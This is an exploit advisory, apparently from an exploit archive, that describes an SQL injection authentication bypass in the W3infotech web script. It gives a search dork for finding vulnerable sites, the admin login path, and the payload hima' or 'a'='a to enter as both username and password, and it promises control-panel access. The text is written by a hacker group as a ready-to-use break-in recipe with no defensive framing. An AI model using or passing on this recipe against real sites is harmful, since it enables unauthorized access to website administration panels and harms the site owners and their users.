id: 10010
date: 11/24/2009
title: W3infotech ( Auth Bypass ) SQL Injection Vulnerability
author: ViRuS_Hima
cves: 

======================================================
W3infotech ( Auth Bypass ) SQL Injection Vulnerability
======================================================

[+]====================================================================||
[*] About    : W3infotech ( Auth Bypass ) SQL injection Vulnerability  ||
[!] Site     : http://www.w3infotech.com                               ||
[!] Author   : ViRuS_HiMa                                                                                   ||                                                                ||
[!] Location : Cairo-007                                               ||
[!]====================================================================||
[!]                  [H]eL[L] [Z]on[E] [C]re[W]                        ||
[!]====================================================================||
[!]
[!] Exploitation :                                                     ||
[!]
[!]    you can use this dork :  "Powered By W3infotech"                ||
[!]
[!]    Just add the admin path ,, so it will be :                      ||
[!]   
[!]    http://server/admin                                             ||   
[!]
[!]    then auth bypass using this password :                          ||
[!]
[!]    hima' or 'a'='a                                                 ||
[!]
[!]    it mean that you have to type the same code in user and pass    ||
[!]
[!]    what you got ?? ,, you are in the script control panel now :p   ||
[!]                                                              
[!]====================================================================||


#  0day.today [2023-03-21]  #